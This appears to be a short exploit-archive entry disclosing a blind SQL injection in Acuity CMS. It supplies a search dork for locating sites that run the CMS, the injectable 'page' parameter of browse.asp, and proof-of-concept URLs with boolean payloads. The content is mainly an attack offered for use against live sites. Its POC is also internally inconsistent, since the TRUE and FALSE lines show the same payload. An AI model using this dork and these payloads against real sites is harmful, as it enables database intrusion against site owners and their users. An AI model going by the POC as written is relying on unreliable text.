Acuity CMS Vulnerable to Blind SQL Injection



EKU-ID: 311 CVE: OSVDB-ID:
Author: p0pc0rn Published: 2011-05-24 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


Title : Acuity CMS Vulnerable to Blind SQL Injection
Found by : p0pc0rn
Dork  : intext:"Powered by Acuity CMS."
Web   : http://www.acuitycms.com/

SQL Injection
----------------
http://www.site.com/browse.asp?page=[Blind SQL]

POC
----
http://www.site.com/browse.asp?page=255+or+1=1 TRUE
http://www.site.com/browse.asp?page=255+or+1=1 FALSE